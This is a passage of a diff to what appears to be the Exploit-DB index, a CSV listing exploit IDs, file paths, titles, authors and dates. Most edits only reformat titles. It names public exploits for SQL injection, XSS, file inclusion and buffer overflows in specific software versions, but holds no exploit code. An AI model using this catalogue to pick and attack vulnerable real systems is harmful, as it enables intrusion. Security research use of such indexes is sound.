@@ id,file,description,date,author,platform,type,port 29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Change Admin Password CSRF",2013-11-13,"Hubert Gradek",hardware,webapps,0 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 - System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0 -29572,platforms/php/webapps/29572.txt,"CPanel 11 PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 -29573,platforms/multiple/remote/29573.xml,"Sage 1.3.6 Extension Feed HTML Injection",2007-02-09,Fukumori,multiple,remote,0 +29572,platforms/php/webapps/29572.txt,"CPanel 11 - PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 +29573,platforms/multiple/remote/29573.xml,"Sage 1.3.6 - Extension Feed HTML Injection",2007-02-09,Fukumori,multiple,remote,0 29574,platforms/php/webapps/29574.php,"eXtreme File Hosting - Arbitrary RAR File Upload",2007-02-09,"hamed bazargani",php,webapps,0 29575,platforms/windows/remote/29575.txt,"Plain Old Webserver 0.0.7/0.0.8 Firefox Extension Directory Traversal",2006-09-25,"Stefano Di Paola",windows,remote,0 29576,platforms/jsp/webapps/29576.txt,"Atlassian JIRA 3.7.3 - BrowseProject.JSPA Cross-Site Scripting",2007-02-09,BL4CK,jsp,webapps,0 @@ -26659,8 +26654,8 @@ id,file,description,date,author,platform,type,port 29611,platforms/asp/webapps/29611.txt,"Turuncu Portal 1.0 - H_Goster.ASP SQL Injection",2007-02-16,chernobiLe,asp,webapps,0 29612,platforms/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF",2013-11-15,"Yakir Wizman",hardware,webapps,0 29613,platforms/windows/dos/29613.txt,"CoolPlayer+ Portable 2.19.4 - Local Buffer Overflow",2013-11-15,"Mike Czumak",windows,dos,0 -29614,platforms/osx/remote/29614.xml,"Parallels Drag and Drop Hidden Share",2007-02-16,"Rich Mogull",osx,remote,0 -29615,platforms/php/webapps/29615.txt,"Powerschool 4.3.6/5.1.2 Javascript File Request Information Disclosure",2007-02-19,gheetotank,php,webapps,0 +29614,platforms/osx/remote/29614.xml,"Parallels - Drag and Drop Hidden Share",2007-02-16,"Rich Mogull",osx,remote,0 +29615,platforms/php/webapps/29615.txt,"Powerschool 4.3.6/5.1.2 - Javascript File Request Information Disclosure",2007-02-19,gheetotank,php,webapps,0 29616,platforms/osx/dos/29616.xml,"Apple iTunes 7.0.2 - XML Parsing Remote Denial of Service",2007-02-19,poplix,osx,dos,0 29617,platforms/windows/dos/29617.pl,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)",2007-02-19,"Parveen Vashishtha",windows,dos,0 29618,platforms/windows/dos/29618.c,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (2)",2007-02-19,Marsu,windows,dos,0 @@ -26668,7 +26663,7 @@ id,file,description,date,author,platform,type,port 29620,platforms/osx/dos/29620.txt,"Apple Mac OS X 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0 29621,platforms/php/webapps/29621.txt,"AbleDesign MyCalendar 2.20.3 - Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-02-20,sn0oPy,php,webapps,0 29622,platforms/asp/webapps/29622.txt,"Design4Online - Userpages2 Page.ASP SQL Injection",2007-02-20,xoron,asp,webapps,0 -29623,platforms/cgi/webapps/29623.txt,"Google Desktop Cross-Site Scripting Weakness",2007-02-21,"Yair Amit",cgi,webapps,0 +29623,platforms/cgi/webapps/29623.txt,"Google Desktop - Cross-Site Scripting Weakness",2007-02-21,"Yair Amit",cgi,webapps,0 29624,platforms/php/webapps/29624.txt,"CedStat 1.31 - Index.php Cross-Site Scripting",2007-02-21,sn0oPy,php,webapps,0 29625,platforms/php/webapps/29625.txt,"phpTrafficA 1.4.1 - plotStat.php file Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 29626,platforms/php/webapps/29626.txt,"phpTrafficA 1.4.1 - banref.php lang Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 @@ -26717,7 +26712,7 @@ id,file,description,date,author,platform,type,port 29670,platforms/php/webapps/29670.txt,"WordPress Make A Statement (MaS) Theme - CSRF",2013-11-18,DevilScreaM,php,webapps,80 30367,platforms/php/webapps/30367.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 - admin/membersearch.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 - URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos,0 -30188,platforms/windows/dos/30188.txt,"Apple Safari Feed URI Denial of Service",2007-05-13,"Moshe Ben-Abu",windows,dos,0 +30188,platforms/windows/dos/30188.txt,"Apple Safari - Feed URI Denial of Service",2007-05-13,"Moshe Ben-Abu",windows,dos,0 30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps,0 30190,platforms/php/webapps/30190.txt,"Joomla! Letterman Subscriber Module 1.2.4 - Mod_Lettermansubscribe.php Cross-Site Scripting",2007-06-14,"Edi Strosar",php,webapps,0 30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 - Autoscroll Parameter Cross-Site Scripting",2007-06-14,"Rajat Swarup",jsp,webapps,0 @@ -26752,15 +26747,15 @@ id,file,description,date,author,platform,type,port 30369,platforms/php/webapps/30369.txt,"AlstraSoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30370,platforms/php/webapps/30370.txt,"AlstraSoft Affiliate Network Pro 8.0 - merchants/temp.php rowid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30371,platforms/php/webapps/30371.txt,"AlstraSoft Affiliate Network Pro 8.0 - merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 -29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 PHP.INI File Modification",2007-03-03,"Stefan Esser",php,local,0 -29713,platforms/linux/dos/29713.html,"KDE Konqueror 3.5 JavaScript IFrame Denial of Service",2007-03-05,mark,linux,dos,0 +29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 - PHP.INI File Modification",2007-03-03,"Stefan Esser",php,local,0 +29713,platforms/linux/dos/29713.html,"KDE Konqueror 3.5 - JavaScript IFrame Denial of Service",2007-03-05,mark,linux,dos,0 29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - Sys_Tee Local Privilege Escalation",2007-03-05,"Michael Kerrisk",linux,local,0 -29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 Client Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0 +29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0 29716,platforms/linux/dos/29716.txt,"Silc Server 1.0.2 - New Channel Remote Denial of Service",2007-03-06,"Frank Benkstein",linux,dos,0 29717,platforms/linux/dos/29717.txt,"radscan conquest 8.2 - Multiple Vulnerabilities",2007-03-07,"Luigi Auriemma",linux,dos,0 29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - (.m3u) SEH Buffer Overflow (Unicode)",2013-11-24,"Mike Czumak",windows,local,0 -29720,platforms/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 Document.Cookie Path Argument Denial of Service",2007-03-08,"Nicolas DEROUET",linux,dos,0 -29721,platforms/windows/dos/29721.pl,"Fish Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 +29720,platforms/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 - Document.Cookie Path Argument Denial of Service",2007-03-08,"Nicolas DEROUET",linux,dos,0 +29721,platforms/windows/dos/29721.pl,"Fish - Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 29723,platforms/linux/dos/29723.txt,"Mozilla Firefox 2.0.0.2 - Unspecified GIF Handling Denial of Service",2007-03-09,Samuel,linux,dos,0 29724,platforms/linux/dos/29724.txt,"MySQL 5.0.x - Single Row SubSelect Remote Denial of Service",2007-03-09,S.Streichsbier,linux,dos,0 @@ -26781,17 +26776,17 @@ id,file,description,date,author,platform,type,port 29739,platforms/linux/remote/29739.txt,"Apache HTTP Server Tomcat 5.x/6.0.x - Directory Traversal",2007-03-14,"D. Matscheko",linux,remote,0 29740,platforms/windows/dos/29740.txt,"MiniGZip Controls File_Compress Buffer Overflow",2007-03-14,starcadi,windows,dos,0 29741,platforms/windows/remote/29741.txt,"Microsoft Internet Explorer 7.0 - NavCancel.HTM Cross-Site Scripting",2007-03-14,"Aviv Raff",windows,remote,0 -29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 +29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 29743,platforms/windows/dos/29743.txt,"Symantec SYMTDI.SYS Device Driver - Local Denial of Service (DoS)",2007-03-15,"David Matousek",windows,dos,0 29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 - Index.php Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0 29745,platforms/php/webapps/29745.txt,"Horde Framework 3.1.3 - Login.php Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0 29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0 -29747,platforms/php/webapps/29747.txt,"DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting",2007-03-16,Mandr4ke,php,webapps,0 +29747,platforms/php/webapps/29747.txt,"DirectAdmin 1.292 - CMD_USER_STATS Cross-Site Scripting",2007-03-16,Mandr4ke,php,webapps,0 29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 - Enkrypt.php Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0 29749,platforms/multiple/remote/29749.txt,"Oracle Portal 10g - P_OldURL Parameter Cross-Site Scripting",2007-03-16,d3nx,multiple,remote,0 29750,platforms/php/webapps/29750.php,"PHPStats 0.1.9 - Multiple SQL Injection",2007-03-16,rgod,php,webapps,0 29751,platforms/php/webapps/29751.php,"PHPStats 0.1.9 - PHP-Stats-Options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 -29752,platforms/php/remote/29752.php,"PHP 5.1.6 Mb_Parse_Str Function Register_Globals Activation Weakness",2007-03-19,"Stefan Esser",php,remote,0 +29752,platforms/php/remote/29752.php,"PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation Weakness",2007-03-19,"Stefan Esser",php,remote,0 29753,platforms/linux/remote/29753.c,"File(1) 4.13 - Command File_PrintF Integer Underflow",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote,0 29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0 @@ -26806,7 +26801,7 @@ id,file,description,date,author,platform,type,port 29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 - profile.php showuser Parameter XSS",2007-03-20,"laurent gaffie",php,webapps,0 29765,platforms/php/webapps/29765.txt,"W-Agora 4.2.1 - search.php search_user Parameter XSS",2007-03-20,"laurent gaffie",php,webapps,0 29766,platforms/php/webapps/29766.txt,"W-Agora 4.2.1 - change_password.php userid Parameter XSS",2007-03-20,"laurent gaffie",php,webapps,0 -29767,platforms/hardware/dos/29767.txt,"ZyXEL Router 3.40 Zynos SMB Data Handling Denial of Service",2007-03-20,"Joxean Koret",hardware,dos,0 +29767,platforms/hardware/dos/29767.txt,"ZyXEL Router 3.40 Zynos - SMB Data Handling Denial of Service",2007-03-20,"Joxean Koret",hardware,dos,0 29768,platforms/linux/remote/29768.txt,"Mozilla FireFox 1.5.x/2.0 - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29769,platforms/linux/remote/29769.txt,"Opera 9.x - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29770,platforms/linux/remote/29770.txt,"KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 @@ -26820,11 +26815,11 @@ id,file,description,date,author,platform,type,port 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],php,webapps,0 29781,platforms/linux/dos/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c NULL Pointer Dereference DoS",2007-03-26,"Joey Mengele",linux,dos,0 29782,platforms/php/webapps/29782.txt,"Satel Lite - Satellite.php Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0 -29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps,0 -29784,platforms/php/remote/29784.php,"PHP 5.2.1 Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote,0 +29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 - RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps,0 +29784,platforms/php/remote/29784.php,"PHP 5.2.1 - Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote,0 29785,platforms/php/remote/29785.txt,"aBitWhizzy - whizzypic.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 29786,platforms/php/webapps/29786.txt,"aBitWhizzy - whizzylink.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 -29787,platforms/windows/dos/29787.py,"HP Jetdirect FTP Print Server RERT Command Denial of Service",2007-01-18,Handrix,windows,dos,0 +29787,platforms/windows/dos/29787.py,"HP Jetdirect FTP Print Server - RERT Command Denial of Service",2007-01-18,Handrix,windows,dos,0 29788,platforms/php/remote/29788.php,"PHP 4.4.4 - Zip_Entry_Read() Integer Overflow",2007-03-27,"Stefan Esser",php,remote,0 30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0 30105,platforms/php/webapps/30105.txt,"WordPress Download Manager Free & Pro 2.5.8 Plugin - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 @@ -26852,9 +26847,9 @@ id,file,description,date,author,platform,type,port 30127,platforms/php/webapps/30127.txt,"Prototype of an PHP application 0.1 - plugins/phpgacl/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30128,platforms/php/webapps/30128.txt,"Prototype of an PHP application 0.1 - index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30129,platforms/php/webapps/30129.txt,"Prototype of an PHP application 0.1 - common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30130,platforms/php/remote/30130.txt,"PHP 5.2.3 EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",php,remote,0 +30130,platforms/php/remote/30130.txt,"PHP 5.2.3 - EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",php,remote,0 30131,platforms/php/webapps/30131.txt,"Buttercup WFM - Title Parameter Cross-Site Scripting",2007-06-01,"John Martinelli",php,webapps,0 -30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) Cross-Site script",2007-06-01,"Glafkos Charalambous ",php,webapps,0 +30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) - Cross-Site script",2007-06-01,"Glafkos Charalambous ",php,webapps,0 30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 - chat.php sid Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 - help.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 - admin/header.php admin[name] Parameter XSS",2007-06-01,ReZEN,php,webapps,0 @@ -26913,15 +26908,15 @@ id,file,description,date,author,platform,type,port 29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista - ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 - LPEXT.DLL Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 -29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS Perl Code Evaluation",2013-11-25,Metasploit,hardware,remote,443 -29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 BMP Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 +29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation",2013-11-25,Metasploit,hardware,remote,443 +29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - .BMP Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.ASP SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29820,platforms/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote,0 29821,platforms/php/webapps/29821.txt,"Livor 2.5 - Index.php Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0 29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 -29823,platforms/php/dos/29823.c,"PHP 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 +29823,platforms/php/dos/29823.c,"PHP 5.2.1 GD Extension - .WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 29824,platforms/php/webapps/29824.txt,"QuizShock 1.6.1 - Auth.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 29825,platforms/php/webapps/29825.txt,"UBB.Threads 6.1.1 - UBBThreads.php SQL Injection",2007-04-09,"John Martinelli",php,webapps,0 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",linux,dos,0 @@ -26934,7 +26929,7 @@ id,file,description,date,author,platform,type,port 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins - Remote File Upload",2013-11-26,link_satisi,php,webapps,0 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - DSKernel2.DLL ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,windows,remote,0 -29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0 +29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 @@ -26950,12 +26945,12 @@ id,file,description,date,author,platform,type,port 29850,platforms/windows/dos/29850.txt,"eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities",2007-04-12,"Leon Juranic",windows,dos,0 29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - Check_login.ASP Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",php,webapps,0 29852,platforms/php/webapps/29852.txt,"Doop Content Management System 1.3.x - Multiple Input Validation Vulnerabilities",2007-04-13,KaBuS,php,webapps,0 -29853,platforms/windows/remote/29853.rb,"LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow",2007-04-13,"Aaron Portnoy",windows,remote,0 +29853,platforms/windows/remote/29853.rb,"LanDesk Management Suite 8.7 Alert Service - AOLSRVR.EXE Buffer Overflow",2007-04-13,"Aaron Portnoy",windows,remote,0 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 - Img_Popup.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 29855,platforms/php/webapps/29855.txt,"Flowers - Cas.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,Metasploit,windows,remote,0 29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)",2013-11-27,Metasploit,windows,remote,0 -29859,platforms/java/remote/29859.rb,"Apache Roller OGNL Injection",2013-11-27,Metasploit,java,remote,8080 +29859,platforms/java/remote/29859.rb,"Apache Roller - OGNL Injection",2013-11-27,Metasploit,java,remote,8080 29860,platforms/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 - Vsdatant.SYS Driver Local Denial of Service",2007-04-15,"Matousec Transparent security",windows,dos,0 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0 29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe - Footer.php Local File Inclusion",2007-04-16,BeyazKurt,php,webapps,0 @@ -27023,27 +27018,27 @@ id,file,description,date,author,platform,type,port 29926,platforms/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - (.mp3) Crash PoC",2013-11-30,"Akin Tosunlar",windows,dos,0 29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta_ Inc. DPR2320R2 - Multiple CSRF",2013-11-30,sajith,hardware,webapps,0 29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 - BRY.ASP SQL Injection",2007-04-26,RMx,asp,webapps,0 -29930,platforms/multiple/remote/29930.txt,"Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure",2007-04-27,jericho+bblog@attrition.org,multiple,remote,0 +29930,platforms/multiple/remote/29930.txt,"Apache AXIS 1.0 - Non-Existent WSDL Path Information Disclosure",2007-04-27,jericho+bblog@attrition.org,multiple,remote,0 29931,platforms/multiple/remote/29931.txt,"ManageEngine Password Manager Pro Build 5401 - Database Remote Unauthorized Access",2007-04-27,anonymous,multiple,remote,0 29932,platforms/linux/remote/29932.txt,"Red Hat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0 29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal - Down_Indir.ASP SQL Injection",2007-04-30,ertuqrul,asp,webapps,0 29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 - (.zip) Crash PoC",2013-11-30,KAI,windows,dos,0 29935,platforms/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0 29938,platforms/php/webapps/29938.txt,"E-Annu - Home.php SQL Injection",2007-04-30,ilkerkandemir,php,webapps,0 -29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 XRender Extension Divide by Zero Denial of Service",2007-05-01,"Derek Abdine",linux,dos,0 -29940,platforms/windows/dos/29940.html,"Mozilla Firefox 2.0.0.3 Href Denial of Service",2007-05-01,"Carl Hardwick",windows,dos,0 +29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 - XRender Extension Divide by Zero Denial of Service",2007-05-01,"Derek Abdine",linux,dos,0 +29940,platforms/windows/dos/29940.html,"Mozilla Firefox 2.0.0.3 - Href Denial of Service",2007-05-01,"Carl Hardwick",windows,dos,0 29941,platforms/php/webapps/29941.txt,"CMS Made Simple 105 - Stylesheet.php SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0 29942,platforms/windows/dos/29942.c,"Atomix MP3 Malformed MP3 - File Buffer Overflow",2007-05-02,preth00nker,windows,dos,0 29943,platforms/windows/dos/29943.c,"Progress WebSpeed 3.0/3.1 - Denial of Service",2007-05-02,"Eelko Neven",windows,dos,0 29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0 -29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",hardware,remote,0 +29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",hardware,remote,0 29946,platforms/php/webapps/29946.txt,"WordPress Orange Themes - CSRF File Upload",2013-12-01,"Jje Incovers",php,webapps,0 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - Content.php SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0 30198,platforms/asp/webapps/30198.txt,"TDizin - Arama.ASP Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0 30199,platforms/cgi/webapps/30199.txt,"WebIf - OutConfig Parameter Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0 30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 29949,platforms/windows/dos/29949.c,"Multiple Vendors - Zoo Compression Algorithm Remote Denial of Service",2007-05-04,Jean-Sébastien,windows,dos,0 -29950,platforms/osx/local/29950.js,"Apple 2.0.4 Safari Unspecified Local",2007-05-04,poplix,osx,local,0 +29950,platforms/osx/local/29950.js,"Apple 2.0.4 - Safari Unspecified Local",2007-05-04,poplix,osx,local,0 29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,windows,remote,0 29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 - MFA_Theme.php Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 - /011.1 Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 @@ -27056,7 +27051,7 @@ id,file,description,date,author,platform,type,port 29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - index.php l Parameter XSS",2007-05-07,"John Martinelli",php,webapps,0 29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - Index.PL Cross-Site Scripting",2007-05-07,ciri,cgi,webapps,0 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 - Index.php Cross-Site Scripting",2007-05-07,Red_Casper,php,webapps,0 -29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow",2007-05-07,MC,windows,remote,0 +29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - SpntSvc.EXE Remote Stack Based Buffer Overflow",2007-05-07,MC,windows,remote,0 29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - Picture.php Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 - Alias.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 - Article.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 @@ -27127,7 +27122,7 @@ id,file,description,date,author,platform,type,port 30084,platforms/php/webapps/30084.php,"WordPress page-flip-image-gallery Plugins - Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 - Index.php Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 -30088,platforms/php/webapps/30088.txt,"Pligg 9.5 Reset Forgotten Password Security 